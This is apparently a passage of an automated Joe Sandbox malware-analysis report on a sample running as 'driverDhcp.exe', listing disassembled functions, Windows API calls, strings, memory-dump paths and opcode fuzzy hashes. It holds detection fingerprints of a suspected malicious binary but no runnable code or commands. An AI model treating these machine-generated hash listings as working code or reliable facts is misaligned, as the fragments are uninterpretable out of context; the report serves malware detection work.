Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: 2ff306deb706ad673cc928ae8584d5f4b90850e9ebb5ced13957bcb1b9445270
Instruction ID: 9ec0f3ba38b2d8fc4da71c59c633bc2453f6e1b11aced8cd68e017e262bde097
Opcode Fuzzy Hash: 2ff306deb706ad673cc928ae8584d5f4b90850e9ebb5ced13957bcb1b9445270
Instruction Fuzzy Hash: 67418371804218AAEB25EB54DD45EEEB37CFF45304F0140AAB649E7092DB745F84CFA2

Function 0086B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 0086B708
\\?\, xrefs: 0086B6BE, 0086B6FA, 0086B75B, 0086B7AE

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: a94d21cd654584e21fd3d05751386aab854e5526e2d733b4f15ad862f9fa6d9f
Instruction ID: e9edd141abae405a030b00a79583a8115f9760d8a2a93d0c32ff16dd0fe26915
Opcode Fuzzy Hash: a94d21cd654584e21fd3d05751386aab854e5526e2d733b4f15ad862f9fa6d9f
Instruction Fuzzy Hash: F241AD3540021DABCF20AF25DC41EAB7BADFF81398F124025F814E7252E771DAC0CAA1

Function 00878FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00878FC4

Strings

Shell.Explorer, xrefs: 00878FEF
about:blank, xrefs: 00879082

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 092c1fa64f917a1283532bf56f5a462fa6021cd6b523a8fc5c01d7c35ef63a00
Instruction ID: 4416eeca4506d125d644452da00492779f3f50642461946ee1c2e5ef144c95db
Opcode Fuzzy Hash: 092c1fa64f917a1283532bf56f5a462fa6021cd6b523a8fc5c01d7c35ef63a00
Instruction Fuzzy Hash: A5216F712146149FCB08EF68C895A2A77A8FF44711B18C56EF85DCB28ADA70ED01CB61

Function 0086EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 0086EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0086EB92
Part of subcall function 0086EB73: GetProcAddress.KERNEL32(008A81C0,CryptUnprotectMemory), ref: 0086EBA2

GetCurrentProcessId.KERNEL32(?,?,?,0086EBEC), ref: 0086EC84

Strings

CryptProtectMemory failed, xrefs: 0086EC3B
CryptUnprotectMemory failed, xrefs: 0086EC7C

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 4b79c1fec595c6d5d7c74f6c71eece5a20421a5f16ecfc8c0596825ef7e14766
Instruction ID: 6200abc739f435f40daad14bce3e5fb2e769671b6ce455a2472f36e680bfac57
Opcode Fuzzy Hash: 4b79c1fec595c6d5d7c74f6c71eece5a20421a5f16ecfc8c0596825ef7e14766
Instruction Fuzzy Hash: 09119E35A106289FEB25AF38DC06A6E3B14FF01720B06411AFC05EF281DB35AE0187D5

Function 00870889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,008709D0,?,00000000,00000000), ref: 008708AD
SetThreadPriority.KERNEL32(?,00000000), ref: 008708F4

Part of subcall function 00866E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00866EAF

Strings

CreateThread failed, xrefs: 008708B9

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: c814c049e2ec0d273d8be594f217e32f021cbab519664b3ce6120c84d1f5e087
Instruction ID: d28c76eee3f12c3a34f7ba602db512ba4fe1012d55c43ee2f330d1d577a8c4a8
Opcode Fuzzy Hash: c814c049e2ec0d273d8be594f217e32f021cbab519664b3ce6120c84d1f5e087
Instruction Fuzzy Hash: 3E01F9B1344305AFE624AF94EC81F667398FB41711F20013EF69AE61C5CEB1F8419E65

Function 0086130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0086DA98: _swprintf.LIBCMT ref: 0086DABE
Part of subcall function 0086DA98: _strlen.LIBCMT ref: 0086DADF
Part of subcall function 0086DA98: SetDlgItemTextW.USER32(?,0089E154,?), ref: 0086DB3F
Part of subcall function 0086DA98: GetWindowRect.USER32(?,?), ref: 0086DB79
Part of subcall function 0086DA98: GetClientRect.USER32(?,?), ref: 0086DB85

GetDlgItem.USER32(00000000,00003021), ref: 0086134F
SetWindowTextW.USER32(00000000,008935B4), ref: 00861365

Strings

0, xrefs: 0086130E

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 221a22030a65abeebe82ad7a342289244abf9bbe36c4f3fbcbfdf3e873df1b9c
Instruction ID: 0901dd37f26a18fd16e291bebcfbdf2a12e98f1cbdca85343fd0b2ce414e653b
Opcode Fuzzy Hash: 221a22030a65abeebe82ad7a342289244abf9bbe36c4f3fbcbfdf3e873df1b9c
Instruction Fuzzy Hash: 6DF0813010434CA6DF251F64890DBA93BA8FB15309F0E4014FE46D4BB2C778C995AA54

Function 0087084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00870A78,?), ref: 00870854
GetLastError.KERNEL32(?), ref: 00870860

Part of subcall function 00866E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00866EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00870869

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: a864383ca8d9f52f60deada30a385b5cb112f4a5ba59b078c626e236dee51be7
Instruction ID: bba7f97daeb3bc9ace41d8577047712c6a86877b5b665af495db45c5e9ce71aa
Opcode Fuzzy Hash: a864383ca8d9f52f60deada30a385b5cb112f4a5ba59b078c626e236dee51be7
Instruction Fuzzy Hash: C8D05B3150842066DA1037A89C09DAF7905FF52730F654715F23DE51F5DE21096185D6

Function 0086DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0086D32F,?), ref: 0086DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0086D32F,?), ref: 0086DA61

Strings

RTL, xrefs: 0086DA5B

Memory Dump Source

Source File: 00000000.00000002.2001602241.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.2001586917.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001629570.0000000000893000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.000000000089E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001648416.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2001696295.00000000008C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_Mj6WEKda85.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 5c078f7e8ec2ef4f5476e0cfcd280133df4b8ac5123781ec292be66770140ef1
Instruction ID: c9413f5455983d4e9e4e5087e5041ced758e23a6f5a6428206946bc16b9a3af2
Opcode Fuzzy Hash: 5c078f7e8ec2ef4f5476e0cfcd280133df4b8ac5123781ec292be66770140ef1
Instruction Fuzzy Hash: F4C0123178975076DB3037706C0DB432D88BB11B12F0D044DB141DA1D0D5E6C9408650

Analysis Process: driverDhcp.exePID: 1520, Parent PID: 2836COMMON

Executed Functions

Function 00007FF848F33448 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

L_H, xrefs: 00007FF848F3375D

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID: L_H
API String ID: 0-402390507
Opcode ID: cd59da187924662f93ca1fe068ba31eeb872af79ce773575c9d5eeb995e2fc4e
Instruction ID: 39648efe41c351cd7d62c1237b24f1fa0e0c1641a34405636822b60763122c9c
Opcode Fuzzy Hash: cd59da187924662f93ca1fe068ba31eeb872af79ce773575c9d5eeb995e2fc4e
Instruction Fuzzy Hash: 18C1AE3091DA8E8FEB85EB68D8596B9BBF0FF19340F4401BAD009C72D2DB396945CB15

Function 00007FF848F32BD0 Relevance: 1.0, Instructions: 954COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a99c17e416ce6fb97557384ffede1dfeac62cd15fb18d9909a1d9528aabc744
Instruction ID: 63fd7cce2426e2e4ba5854986f72e74c23b847ad5f563dceec05468d761a1f8e
Opcode Fuzzy Hash: 7a99c17e416ce6fb97557384ffede1dfeac62cd15fb18d9909a1d9528aabc744
Instruction Fuzzy Hash: AE62693090DA8E8FDB86EF28C8596B97BE0FF19341F0505BBD409C71A2EB35A594CB54

Function 00007FF848F39D60 Relevance: .9, Instructions: 870COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ede72eeda3b3de55daf216ed9c7a6277ebde03923d5bcd82ba1fbc9dd5ce853d
Instruction ID: aecc9e329df3ec7ad8544828bdd8966f18d14256e8169b4dfd304f37c3b80be9
Opcode Fuzzy Hash: ede72eeda3b3de55daf216ed9c7a6277ebde03923d5bcd82ba1fbc9dd5ce853d
Instruction Fuzzy Hash: C0528F7091DB8A8FDB96EF2488596E97FB0FF16301F0504BBE809C71A2EB38A554C751

Function 00007FF848F39F38 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65d7defe5d4c1c838c5d9742ee8387d4201b4f5ee1b1fa70cf012f104d05d148
Instruction ID: e2d4531857038ae3ac901dae090788b27fbf313758ecd4af1f9c8949f22e8aa4
Opcode Fuzzy Hash: 65d7defe5d4c1c838c5d9742ee8387d4201b4f5ee1b1fa70cf012f104d05d148
Instruction Fuzzy Hash: 13326F3091DA8E8FDB96EF2488596F97BB0FF15341F0505BBE809C71A2EB38A594C741

Function 00007FF848F3A76D Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ca3abfaf3cc8ee0f13e6ce52a9f1e0d9975625b917179ff788d8064869d3a6b
Instruction ID: d8a341d84fbc8c63aa1a174ced01e6ded0309e642c291f9329937c51d066f79e
Opcode Fuzzy Hash: 4ca3abfaf3cc8ee0f13e6ce52a9f1e0d9975625b917179ff788d8064869d3a6b
Instruction Fuzzy Hash: FFC1BC3190EB8A9FD746EB2488596F9BBF0FF59300F0545BBD409CA0E2EB38A484C755

Function 00007FF848F3AAA8 Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 513db0a39d77ab043837e310d51ea7296d0d781f4bfb7fb2685237cc790e3a65
Instruction ID: 6c9ba35e6dc3d5f3b42fa91604185a7b671d15638ce4fa0010e1f4e16a5eedc2
Opcode Fuzzy Hash: 513db0a39d77ab043837e310d51ea7296d0d781f4bfb7fb2685237cc790e3a65
Instruction Fuzzy Hash: DDA1A93090D64A8FEB49EF64C8596BA7BB0FF28341F1105BFD40AD61D2DB38A544CB84

Function 00007FF848F45310 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

8mH, xrefs: 00007FF848F4540A

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID: 8mH
API String ID: 0-1362847371
Opcode ID: 92a3bb4356c8a7bb07e9e03c1809ee973173efe857eb9384643e9a313ab39b6c
Instruction ID: 51cc9a3070bc9015b9876db7eb32bf0306aa541c08a13a2f7e80fd9b4b358705
Opcode Fuzzy Hash: 92a3bb4356c8a7bb07e9e03c1809ee973173efe857eb9384643e9a313ab39b6c
Instruction Fuzzy Hash: F2511670D1891D8FEB94EB68D859BADBBF1FF68741F10006AD00DE7292DB396885CB44

Function 00007FF848F31160 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

PyH, xrefs: 00007FF848F311BD

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID: PyH
API String ID: 0-553442046
Opcode ID: ef9bb2a9b38fbce7121ae9e0e7c37893f62cb8620ee0c6630990e5ab4334c3fa
Instruction ID: 75f4d1f38696dc4d16defebdea7acb4f8f44eec391e5ebea346466b8aa6fd42e
Opcode Fuzzy Hash: ef9bb2a9b38fbce7121ae9e0e7c37893f62cb8620ee0c6630990e5ab4334c3fa
Instruction Fuzzy Hash: 4D319F30D1DA4E8EEB99FB6888186F97BE0FF59341F0405BBE40AD61D2EF2865848754

Function 00007FF848F311B7 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

PyH, xrefs: 00007FF848F311BD

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID: PyH
API String ID: 0-553442046
Opcode ID: 9de6e3c1b5d1be674976b61fd08939322546a6eca1eecfc1c5e93808ec5aaaa7
Instruction ID: 6a8794371b0c70291daaf84cfbe1e1af69344f8c5f59180da9273cfb1b7cd89b
Opcode Fuzzy Hash: 9de6e3c1b5d1be674976b61fd08939322546a6eca1eecfc1c5e93808ec5aaaa7
Instruction Fuzzy Hash: A1318D31D0894D8FEB48FB68D8556FD77A1FF59341F0005BAE00AE7192EB25A844C790

Function 00007FF848F3A0C8 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 796d5de4259a364afa316c4d9b7e53bb8058ba82dab0dd5d65e821cacdbc23c3
Instruction ID: 04c47d9180bec582d8d8802652a1e5373e5fb1b131730f05ca7eeea77866584d
Opcode Fuzzy Hash: 796d5de4259a364afa316c4d9b7e53bb8058ba82dab0dd5d65e821cacdbc23c3
Instruction Fuzzy Hash: D5027D3091DB8A8FDB96AF2488192F97BA0FF15341F0505BBE809C71D2EB38A594C751

Function 00007FF848F3A1B8 Relevance: .5, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b0755f70f5bd4c4455d88df3756c3a31015c5f32995071f8aad40f4bfddec3
Instruction ID: cb26793e62559a25684348f8bb51c8d0b6fc23b34b1198476f1e77ec7eb01b13
Opcode Fuzzy Hash: 28b0755f70f5bd4c4455d88df3756c3a31015c5f32995071f8aad40f4bfddec3
Instruction Fuzzy Hash: CFF17C3091DA8A8FDB96EF2488196F97BB0FF16341F0505BBE808C71D2EB38A594C751

Function 00007FF848F32CC0 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f4a33ddcb3a1d84266a061136824f68da770e72dc926ceaeaf9715a612df91
Instruction ID: 3b55ca57ffa6291062d789f46487e5b252875e4cff2c331ef8c0738a82b44410
Opcode Fuzzy Hash: 44f4a33ddcb3a1d84266a061136824f68da770e72dc926ceaeaf9715a612df91
Instruction Fuzzy Hash: 77D18B31D0D64A8FEB51FBB888496BABBE0FF19342F0405B7D409C71E6EB38A5448B55

Function 00007FF848F3AB25 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51ed928edc3fb0332e6f5c55f756914bccd453f1fba983926a4c29db43c73a91
Instruction ID: 54a9063dd677b1752e762f580a4004a7898fd0dda4e9898c3d42fc2ec1c1e4ea
Opcode Fuzzy Hash: 51ed928edc3fb0332e6f5c55f756914bccd453f1fba983926a4c29db43c73a91
Instruction Fuzzy Hash: EBD10931D1965ACFEBA8EB68C4547BCB7B1FF69741F10407AD40EA3292CB386841CB55

Function 00007FF848F330CC Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b2590729b199923b9af608a0044ca53625559e8f25295ec483dfdd503ccf037
Instruction ID: a63742be9e147078fe106ae2cd9334ebf758d93fc94969ffd7948a3ce77773e1
Opcode Fuzzy Hash: 8b2590729b199923b9af608a0044ca53625559e8f25295ec483dfdd503ccf037
Instruction Fuzzy Hash: B4C15430D0D6498FEB52EB68D8586ADBBF0EF5A341F0441BBD409D71D2EB38A984CB15

Function 00007FF848F321A5 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 405b5aac4afe5e30d750b12b8e9b5affc6a9641ade05034dfd5b1f16176c764a
Instruction ID: 6d1d47aade2487615474aa0e938ac44d70906292deec5a0372a96012712ce771
Opcode Fuzzy Hash: 405b5aac4afe5e30d750b12b8e9b5affc6a9641ade05034dfd5b1f16176c764a
Instruction Fuzzy Hash: A9B1EA31D0D65A8FEBA9EBA4C8542B8B7A0FF45341F0001BBD44ED72D2DF38A9858B55

Function 00007FF848F3AD60 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e73f65a669716cac1d807385fb9595d38ce566e4e77c28883602d120c25acd4c
Instruction ID: 89f1ee9d83bcd163b6ec9ff60c10c4b282cc03c66db07fc0e9a5e39ea9c9b195
Opcode Fuzzy Hash: e73f65a669716cac1d807385fb9595d38ce566e4e77c28883602d120c25acd4c
Instruction Fuzzy Hash: 01B18F30D0D68A8FEB95EB2488592B97BB0FF69750F0405BBD409D61D2EF386984CB46

Function 00007FF848F31C45 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11d6b55880c38b1ab24e65c8e68356c892594e53467de6c57ac02db9bc920bb5
Instruction ID: 821427a61ba12fb2758d31b594da8721cba8800b390690dbe71203b0576c66b1
Opcode Fuzzy Hash: 11d6b55880c38b1ab24e65c8e68356c892594e53467de6c57ac02db9bc920bb5
Instruction Fuzzy Hash: 6B91CF31A0CA8A8FDB49EF2888551BA7BE1FF99350F1445BFE409C7282DF35A846C745

Function 00007FF848F3A3A8 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aec520f761a34a1ca3474ae8cc212755ba0079ec84813d66b08f96c51136e10
Instruction ID: 7dd91d9e9f2227c2c8382557c1e0da9d9f9499c434a779789fe743570803ccb7
Opcode Fuzzy Hash: 4aec520f761a34a1ca3474ae8cc212755ba0079ec84813d66b08f96c51136e10
Instruction Fuzzy Hash: 5FA16B3095DB8A8FDB86EF6488196F97BB0FF19340F0505BBE808C3192EB38A594C755

Function 00007FF848F32C48 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2059664023.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f30000_driverDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76189bca634e2dd577b9bca62c54504a4c70ba370054d438b67234b1638ee9cf
